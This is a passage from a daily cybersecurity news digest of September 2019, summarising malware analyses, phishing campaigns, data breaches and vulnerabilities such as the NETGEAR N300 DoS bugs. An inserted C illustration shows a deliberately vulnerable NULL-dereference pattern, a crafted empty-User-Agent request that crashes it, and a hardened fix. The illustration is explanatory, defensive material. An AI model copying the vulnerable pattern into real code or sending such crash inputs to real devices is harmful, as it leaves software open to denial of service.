  • The vulnerability allows for process creation impersonation that can lead to privilege escalation when a Remote Procedure Call server tries to impersonate the client and start a process at the same time without the use of an explicit token.
  • A similar flaw was previously found and reported to Microsoft, however no patch was made available.

Source

 

Microsoft Teams package can be used to deliver malware

  • Researcher Reegun Richard identified an EXE sideloading attack that abuses the Squirrel installation and update framework to execute malicious payloads using mock installation folders.
  • Impacted products that use the Squirrel installation and update framework include WhatsApp, Grammarly, GitHub, Slack, and Discord.
  • The researcher tested the attack by crafting a fake Microsoft Teams package that leverages a signed binary to execute in a specific location. Microsoft were informed of the issue but stated that it ‘did not meet the bar of a security issue’.

Source

 

General News

Menstruation apps found to be sharing data with Facebook

  • A study by Privacy International found that multiple menstruation apps are sharing personal data with Facebook, as well as other third parties. The apps include Maya by Plackal Tech, MIA by Mobapp Development Limited, My Period Tracker by Linchpin Health, Ovulation Calculator by Pinkbird, and Mi Calendario by Grupo Familia.
  • According to Privacy International, the type of information a user enters into the apps could be considered health or medical data, which is deemed sensitive data under EU data protection laws. The researchers also noted that all of the apps inform Facebook when a user opens them, before the user has agreed to the apps’ privacy policies.
  • Plackal Tech has since removed Facebook SDK and Analytics SDK from its app. Facebook SDK is used for the integration of an app with Facebook’s platform.

Source

 

Members of major dark web counterfeit currency ring arrested

  • Europol announced that the Portuguese Judicial Police, in cooperation with Europol, arrested five individuals who were part of Europe’s second-largest counterfeit currency network on the dark web. The individuals are accused of counterfeiting and organised crime.
  • A total of 1833 counterfeit banknotes, as well as computers, printers, security papers with security thread incorporation, and more were seized following the arrest.

Source

 

International operation to prevent BEC attacks leads to arrest of 281 individuals

  • On September 10th, 2019, the US Department of Justice announced the results of a multi-agency investigation, named Operation reWired, which led to the arrest of 74 people in the US and 207 overseas on charges relating to financial fraud. 167 individuals were arrested in Nigeria, 18 in Turkey, and 15 in Ghana. Further arrests were also made in France, Italy, Japan, Kenya, Malaysia, and the UK.
  • Operation reWired took place over a period of four months and involved organizations including the US Department of Homeland Security, the US Department of Justice, the US Department of the Treasury, and multiple partner organizations overseas. The investigation disrupted BEC schemes and resulted in the seizure of $3.7 million.
  • The FBI also published information on September 10th, 2019, which showed that between June 2016 and July 2019, over $26 billion was reportedly lost globally in BEC scams.

Source 1 Source 2

 


Silobreaker Daily Cyber Digest – 10 September 2019

 

Malware

DHS publishes analysis of ELECTRICFISH

  • The report by the US Department of Homeland Security’s (DHS) Cybersecurity and Infrastructure Security Agency looks at two variants of ELECTRICFISH, a malware attributed to the North Korean government and referred to as HIDDEN COBRA by the DHS.
  • The purpose of both malware variants is to tunnel traffic between two IP addresses, which is done by using a custom protocol. By using a proxy server or port and a proxy username and password when configuring the malware, threat actors are also capable of bypassing a compromised system’s required authentication to reach outside of the network.

Source (Includes IOCs)

 

Purple Fox malware updated to include fileless capabilities

  • Researchers at Trend Micro observed Purple Fox malware abusing PowerShell, rather than its typical use of Nullsoft Scriptable Install System, making it capable of fileless infection. It also includes additional exploits, most likely to ensure infection. Purple Fox is a downloader, typically delivered by the Rig exploit kit and was first discovered in September 2018.
  • The new variant uses three separate methods to redirect the user to the malicious PowerShell script, namely via a SWF file that exploits CVE-2018-15982, or via two HTM files exploiting the VBScript vulnerabilities CVE-2014-6332 and CVE-2018-8174. If the targeted user does not have administrative access, the Win32k vulnerabilities CVE-2015-1701 and CVE-2018-8120 are also exploited using PowerSploit to gain privileges to install Purple Fox’s main components.
  • Unlike previous versions, this variant abuses an open-source code to enable its rootkit components, as well as a file utility software to hide its DLL component to prevent reverse engineering or cracking attempts.

Source (Includes IOCs)

 

Undocumented backdoor attributed to Stealth Falcon

  • Researchers at ESET identified an unreported binary backdoor, dubbed Win32/StealthFalcon, being used to compromise devices in the United Arab Emirates, Saudi Arabia, Thailand and the Netherlands. The researchers attributed the malware to the Stealth Falcon group who have been active since 2012 and primarily target journalists, activists and dissidents in the Middle East.
  • The backdoor appears to have been created in 2015. It is a DLL file which supports basic commands while also being able to collect data, exfiltrate data, employ further malicious tools, and update its configuration. The backdoor communicates with its C2 through the standard Windows component Background Intelligent Transfer Service.
  • The researchers attributed the backdoor to the Stealth Falcon group by comparing it to a PowerShell backdoor that was discovered by researchers at Citizen Lab. The researchers found that both backdoors communicated with the same C2, share code similarities and use the same hardcoded identifiers.

Source (Includes IOCs)

 

Ongoing Campaigns

Challenger and Harvey Norman warn of phishing scams impersonating the companies

  • The Challenger Technologies scam involves threat actors sending an SMS to customers, falsely claiming they won a mobile phone contest. The link in the text message redirects the user to a phishing site that asks for the user’s credit card details to pay for a processing fee. The company stated it only communicates with customers via its Facebook page, app or shopping site, and not via SMS.
  • Harvey Norman warned its customers of a fake Facebook page impersonating the company, called ‘Harvey Norman-Singapore’, whereas the legitimate company page is ‘Harvey Norman Singapore’. Customers are informed that the company will never ask for personal information or credit card details via unsolicited messages.

Source

 

Malvertising campaigns used to deliver malware via exploit kits

  • Security researcher nao_sec identified four malvertising campaigns that redirected users to the landing pages of various exploit kits. When a user visited the malicious site, the kits attempted to exploit vulnerabilities and install malware on the victim’s system.
  • The first campaign was identified on September 7th, 2019, and used the GrandSoft exploit kit to push the banking trojan Ramnit. The second campaign was identified the following day and utilised the Rig exploit kit to deliver clipboard hijackers and Amadey malware.
  • The final two campaigns were discovered on September 9th, 2019. The first used the Fallout exploit kit to distribute a clipboard hijacker. The second campaign pushed the Radio exploit kit which was used to install Nemty Ransomware.

Source

 

Spam campaign uses LokiBot trojan to target US manufacturing company

  • On August 21st, 2019, researchers at Fortinet identified a malicious spam campaign that was delivering LokiBot trojan. The attack began with an email that was written in broken English and contained an attachment that purported to be a ‘request for quotation’.
  • Users who unzipped the file would infect their system with LokiBot malware. LokiBot steals FTP credentials, email and browser passwords, and other credentials.
  • The IP address which the email was sent from has been used in two other malicious spam attacks, one of which targeted a German bakery. The researchers suggested that the difference in each campaign’s language and attack template indicates that the IP address is a spam relay.

Source (Includes IOCs)

 

Phishing campaign uses CAPTCHA to bypass secure email gateways

  • Researchers at Proofpoint identified a phishing campaign that redirected users to CAPTCHA in order to prevent URL analysis from detecting malicious links. The attack starts from a compromised email account that appears to have originated from a voip2mail service. The email purports to contain a voice message which in actuality is an embedded hyperlink.
  • Targets who click on the link are redirected to a page containing a CAPTCHA code. Secure email gateways (SEG) cannot proceed past the CAPTCHA page to scan the malicious site. The SEG therefore marks the CAPTCHA page as safe and allows the user to proceed.
  • The target then completes the CAPTCHA check and is redirected to a phishing page that asks them to select their Microsoft account and sign in. Both the CAPTCHA page and the main phishing page are hosted on Microsoft infrastructure and are marked as safe by domain reputation databases.

Source (Includes IOCs)

 

Hacker Groups

Thrip group target South East Asian military organisations, satellite operators, and more

  • Researchers at Symantec discovered that the China-based espionage group Thrip have conducted multiple operations in South East Asia since June 2018. The group’s operations targeted twelve organisations in Hong Kong, Macau, Indonesia, Malaysia, the Philippines, and Vietnam. Targets include the military in two countries, satellite communication operators, media organisations and the education sector.
  • The group are using two custom backdoors named Hannotog and Sagerunex to achieve persistence and remote access on target networks. Thrip also steals information from certain computers with their custom Catchamas malware.
  • The researchers stated that Sagerunex is an evolved variant of Evora, which is used by fellow Chinese espionage group Lotus Blossom. The researchers suggested that Thrip and Lotus Blossom may have amalgamated into the same group.

Source (Includes IOCs)

 

Leaks and Breaches

Private data of 50,000 Australian students potentially exposed in Get app data breach

  • A user of the Get app discovered they could request information on other users by using the company’s search function API. The company was formerly known as Qnect Technologies and is used by university societies and clubs for payments. According to the company, changes have been made to prevent such data being visible and affected organisations will be informed.
  • Potentially exposed data includes names, email addresses, dates of birth, Facebook IDs, and phone numbers. The company stated that no personal payment information is stored in its databases.
  • The company had previously suffered a data breach, in which hackers threatened to publish acquired user data unless the company paid the hackers. The data breach took place in 2018, after which Qnect rebranded to Get.

Source

 

Illinois school district hit by ransomware attack

  • Rockford Public Schools District 205 continues to experience outages following a ransomware attack on its systems on September 6th, 2019. The attack affected the district’s internet and information systems, as well as some phone lines. The outages are expected to continue for several days.

Source

 

Likud Party database exposes personal data of about 4 million voters

  • Israeli newspaper Haaretz found a database belonging to the Likud Party by following a link given to representatives at polling stations for instructions on online applications. Likud, whose chairperson is Prime Minister Netanyahu, blocked access to the database within twenty minutes of being informed of the data leak.
  • Exposed data included full names, addresses, mobile phone numbers, ID numbers, and the individual’s political stance on Likud. It remains unclear how Likud obtained the data and how long the data was available to the public.

Source

 

‘Data incident’ exposes personal data of Boy Scouts of America members

  • Boy Scouts of America’s third-party vendor Trail’s End informed the organisation and local councils of a ‘data incident’ that exposed private information of children and their parents. According to Trail’s End, the incident should not be characterised as a data leak, whereas Boy Scouts of America has acknowledged the data breach.
  • Exposed data includes full names, dates of birth, email addresses, phone numbers, parent names, favorite products and affiliation, such as council, district or unit. Social Security numbers and bank information were not exposed.
  • It remains unclear how many individuals were affected, whether the data breach was local or national, and how long the data was exposed.

Source

 

US Secret Service investigates breach at IT contractor Miracle Systems LLC

  • Researcher Brian Krebs reported that an investigation is ongoing at government IT contractor Miracle Systems LLC after a criminal advertised access to their platform on an underground forum. The company has contracts with more than twenty federal agencies including the US Department of Transportation, the National Institutes of Health, and US Citizenship and Immigration Services.
  • The investigation was triggered when a member of a Russian-language cybercrime forum offered to sell access to the contractor’s system for approximately $60,000. The criminal claimed to have access to email correspondence and credentials needed to access the databases of federal agencies.
  • Krebs spoke to Miracle Systems CEO Sandesh Sharda, who stated that the hackers were selling access to ‘old stuff’ from the company’s internal test environment. Sharda did however acknowledge that eight internal systems were infected with the Emotet trojan between November 2018 and July 2019.

Source

 

Vulnerabilities

NETGEAR N300 wireless routers affected by DoS vulnerabilities

  • Researchers at Cisco Talos identified two bugs, tracked as CVE-2019-5054 and CVE-2019-5055, in the NETGEAR N300 line of wireless routers. Both vulnerabilities can be exploited to trigger a DoS condition.
  • CVE-2019-5054 can be triggered by an unauthenticated attacker who sends a specially crafted HTTP request with an empty User-Agent string to a page that requires authentication. This can cause a null pointer dereference and crash the HTTP server.
  • CVE-2019-5055 can also be triggered by an unauthenticated user who sends specially crafted SOAP requests in an invalid sequence. This can result in the hostapd service crashing.
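As an added illustration of the bug class described for CVE-2019-5054 (not NETGEAR’s firmware code, which is not on the page), the hypothetical header lookup below returns NULL for an absent or empty User-Agent; the unchecked pattern passes that straight to a string function, while the hardened handler answers with an HTTP status instead. The request strings and the /admin path are constructed.

```c
/* Hypothetical illustration of a NULL dereference on an empty User-Agent
 * header, the bug class behind CVE-2019-5054. Not NETGEAR's code. */
#include <stddef.h>
#include <string.h>

/* Constructed sample requests, not captured traffic. */
static const char REQ_NORMAL[] =
    "GET /admin HTTP/1.1\r\nHost: router\r\nUser-Agent: curl/7.64\r\n\r\n";
static const char REQ_EMPTY_UA[] =
    "GET /admin HTTP/1.1\r\nHost: router\r\nUser-Agent:\r\n\r\n";

/* Locate a header value in a raw request. Returns NULL when the header is
 * absent or its value is empty; a caller must handle both cases. */
static const char *header_value(const char *req, const char *name)
{
    size_t n = strlen(name);
    const char *p = req;
    while ((p = strstr(p, name)) != NULL) {
        /* match only at the start of a line and only the full header name */
        if ((p == req || p[-1] == '\n') && p[n] == ':') {
            p += n + 1;
            while (*p == ' ' || *p == '\t')
                p++;
            if (*p == '\r' || *p == '\n' || *p == '\0')
                return NULL; /* header present but empty */
            return p;
        }
        p += n;
    }
    return NULL;
}

/* Vulnerable pattern: assumes User-Agent is always present and non-empty.
 * With REQ_EMPTY_UA the NULL result is dereferenced inside strcspn. */
static size_t ua_length_unchecked(const char *req)
{
    return strcspn(header_value(req, "User-Agent"), "\r\n");
}

/* Hardened pattern: an absent or empty User-Agent is ordinary bad input.
 * Returns the HTTP status the server should send for a page needing auth. */
static int auth_page_status(const char *req)
{
    const char *ua = header_value(req, "User-Agent");
    if (ua == NULL)
        return 400; /* reject the malformed request rather than crash */
    /* credential check would follow here; 401 means credentials required */
    return 401;
}
```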

Source

 

Researchers demonstrate ‘patch-gapping’ on critical Chrome one-day vulnerability

  • Researchers at Exodus Intelligence demonstrated ‘patch-gapping’ by developing an exploit for a flaw affecting Chrome’s V8, the open-source component used as Chrome’s JavaScript engine. The vulnerability could allow a malicious actor to execute malicious code inside a user’s browser.
  • Patch-gapping is a practice that involves the development of a one-day exploit kit during the time when a vulnerability is fixed by developers, yet the patch has not been released to users. The researchers warn that threat actors are probably capable of patch-gapping.
  • In the case of the V8 vulnerability, the flaw was fixed in August 2019, with the patch released publicly to users on September 10th, 2019, with Chrome version 77.

Source

 

Red Lion Controls programming software contains multiple vulnerabilities

  • Trend Micro researchers identified four vulnerabilities in Red Lion Controls Crimson programming software, specifically in version 3.0 and prior, and 3.1 prior to the 3112.00 release. Red Lion Controls products are primarily used in the critical manufacturing sector and the company is a subsidiary of Spectris plc. 
  • The vulnerabilities are tracked as CVE-2019-10996, CVE-2019-10978, CVE-2019-10984 and CVE-2019-10990. The most serious bug can be triggered by an attacker who convinces a targeted user to open a specially crafted CD3 file. A successful attacker will gain the ability to remotely execute arbitrary code.
  • A detailed list of vulnerabilities is available via the US Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency.

Source 1 Source 2

 

Telegram messaging app fixes bug that allowed users to view deleted images or files

  • The release of Telegram version 5.11 for Android and iOS fixes a bug that allowed recipients to view files or images after they were deleted by the sender. The issue was discovered by security researcher Dhiraj Mishra who found that deleted Telegram files were locally hosted on a user’s device.

Source

 

Over 1 million IoT radios open to attack through Telnet backdoor

  • Researchers at Vulnerability Lab discovered a vulnerability, tracked as CVE-2019-13473, in the Telnet service that connects IoT radios. The vulnerability impacts ‘a huge amount’ of Imperial and Dabman radios.
  • The flaw is caused by the implementation of weak passwords with hard-coded credentials. Researchers found that it took them approximately ten minutes to gain access to the radio through brute-forcing tactics.
  • The researchers were able to drop malware, send audio streams or add compromised radios to a botnet. Following the compromise, the researchers discovered a second vulnerability, tracked as CVE-2019-13474, in the AirMusic client which allowed unauthenticated command execution.

Source 1 Source 2 (Includes IOCs)

 

The Silobreaker Team

Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.
